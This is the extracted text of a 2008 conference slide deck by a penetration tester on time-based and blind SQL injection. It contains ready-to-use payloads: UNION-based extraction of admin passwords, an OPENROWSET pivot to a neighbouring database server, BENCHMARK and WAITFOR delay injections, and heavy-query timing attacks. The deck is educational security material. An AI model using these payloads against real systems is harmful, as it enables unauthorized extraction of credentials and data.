14:52, 7 October 2008

Download Report

Transcript 14:52, 7 October 2008 

Time based SQL Injection
Presented by Muhaimin
Dzulfakar
1
© 2008 Security-Assessment.com
Who am I
 Muhaimin Dzulfakar – 90% of kiwis can't pronounce it
 Known as 'Emmie'
 Security Consultant – Security-Assessment.com
 Application and network pen-tester
2
© 2008 Security-Assessment.com
Agenda
 What is time based SQL Injection
 Differences between blind and time based SQL Injection
 Time based injection with heavy queries
 Limitation of time based SQL Injection
3
© 2008 Security-Assessment.com
Different types of SQL Injection
 In Band Injection
 Out of Band Injection
 Blind SQL Injection
 Time Based SQL Injection
4
© 2008 Security-Assessment.com
In Band Injection
 Results are embedded via union select
 Useful when SQL error message is displayed
 Fastest way to extract data
 Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null,
null, null, concat(username,0x3a,admin_password), null from
admin/*
5
© 2008 Security-Assessment.com
In Band Injection
6
© 2008 Security-Assessment.com
Out of Band Injection
 Use a different communication channel to drill for data
 Ex: Web Mail application in which data received via SMTP is
processed
 Example of attack: Accessing your neighbour database server with
OOB injection

Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT

a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;

Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT

user, pass FROM users') AS a--
7
© 2008 Security-Assessment.com
Out of Band Injection
www.buyviagra.com
Web server
OOB Injection
Database B
Database A
10.1.1.1
8
© 2008 Security-Assessment.com
Blind SQL Injection
 Application generates custom error message for failed response and
normal page for successful response
 Comparison between true and false response

AND 1=1 -> true
AND 1=2 -> false
 Read data byte by byte
9
© 2008 Security-Assessment.com
Blind SQL Injection
10
© 2008 Security-Assessment.com
Blind SQL Injection
11
© 2008 Security-Assessment.com
Time Based SQL Injection
 Use time based to compare between true and false
 For true response – time delay is executed
 For failed response – time delay is not executed
 Read data byte by byte – exactly the same method with blind
injection
 First example by Chris Anley's paper – More advanced SQL
Injection
 Another example is in David Litchfield paper – Data Mining with
SQL Injection and Inference
12
© 2008 Security-Assessment.com
Why we need Time Based SQL Injection
 When the application generates default page for true or false
response
 When the application generates the same custom error page for
true or false response
 Injection is successful but can't be seen by the attacker
13
© 2008 Security-Assessment.com
Scenario 1 (blind injection attack)
$default=1
if value is not between 1-20
{
redirect user to page.php?id=$default
}
SQL statement
1 AND 1=1 [TRUE] -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed
BLIND INJECTION FAILED
14
© 2008 Security-Assessment.com
Scenario 1 (time based blind injection attack)
$default=1
if value is not between 1-20
{
redirect user to page.php?id=$default
}
SQL statement
1 AND 1=1 [TRUE]
-> take 5 seconds to response
1 AND 1=2 [FALSE]
-> take 1 second to response
SUCCESS
TIME BASED BLIND INJECTION
15
© 2008 Security-Assessment.com
Scenario 2 (blind injection attack)
$values= 1 to 20
if the $values are not between 1-20
{
redirect user to error.php
}
SQL statement
1 AND 1=1 [TRUE] -> error page displayed
1 AND 1=2 [FALSE] -> error page displayed
BLIND INJECTION FAILED
16
© 2008 Security-Assessment.com
Scenario 2 (time based blind injection attack)
$values= 1 to 20
if the $values are not between 1-20
{
redirect user to error.php
}
SQL statement
1 AND 1=1 [TRUE]
-> take 5 seconds to response
1 AND 1=2 [FALSE]
-> take 1 second to response
SUCCESS
TIME BASED BLIND INJECTION
17
© 2008 Security-Assessment.com
Time Based SQL Injection
FALSE = 117ms
TRUE = 2478ms
18
© 2008 Security-Assessment.com
Spot the different
 Blind injection (for mysql)
 1 AND ASCII(substring((@@version),1,1))<52

if first character of database version is less than 4, it is

true

if first character of database version is 4 or more, it is

false
query
position
operator
char
19
© 2008 Security-Assessment.com
Spot the different
 Time Based Blind injection (for MySQL)
 1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT
@@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))

if first character of database version is less than 4,

execute BENCHMARK

if first character of database version is not less than 4 ,

return 1
char
count time
query
operator
time delay
position
20
© 2008 Security-Assessment.com
Time Based Injection on MSSQL

Time based injection (MSSQL)

1 AND if not(substring((select \@\@version),25,1) < 52)

waitfor delay '0:0:9'--

if the first character less than 4, execute waitfor delay
query
time delay
position operator
char
21
© 2008 Security-Assessment.com
Other Databases
 Oracle (without PL/SQL support) MS Access, DB2 do not have delay
functions
 Time Based Injection is possible by using heavy queries
 Chema Alonso and Jose Prada talked about this in Microsoft Security
MVP Article and Defcon 2008
 2 types of conditions in 'where clause'

Light Condition first

Heavy Condition first
 Select A from B where ConditionA and ConditionB
22
© 2008 Security-Assessment.com
Heavy condition first
Heavy condition
100sec
Light Condition
10sec
Heavy & Light
Condition
Result
True
False
False
110
Seconds
True
True
True
110
Seconds
False
-
False
100
Seconds
Result from Alonso research
23
© 2008 Security-Assessment.com
Light condition first
Light condition
10sec
Heavy Condition
100sec
Heavy & Light
Condition
Result
True
False
False
110
Seconds
True
True
True
110
Seconds
False
-
False
10Secon
ds
Result from Alonso research
24
© 2008 Security-Assessment.com
Heavies Queries
 Oracle evaluates the conditions from left to right
 MS Access evaluates the conditions from right to left
 MSSQL evaluates light condition first
 Table name needs to be known
 Default table can be used for testing

MSSQL – sysussers

MySQL – information_schema.colums

Oracle - all_users
25
© 2008 Security-Assessment.com
Heavies Queries
 Example of time based injection using heavy queries on MSSQL
(light condition evaluates first)
 1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as
sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers
as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select
top 1 ASCII(substring(name,1,1)) from sysusers)
 Suitable for databases that do not support time delay functions
 Ex: Oracle and MS Access
heavy query
light query
26
© 2008 Security-Assessment.com
Limitation
 Results are not efficient during busy times
 How to get efficient results ?

Review the ipid checking (hping3)

Perform the test at 3am

Perform the test during Xmas 
 For heavy queries, time delay depends on how much data is
stored in database

The more data, more efficient are the result
27
© 2008 Security-Assessment.com
Demo
28
© 2008 Security-Assessment.com
Question ?
[email protected]
29
© 2008 Security-Assessment.com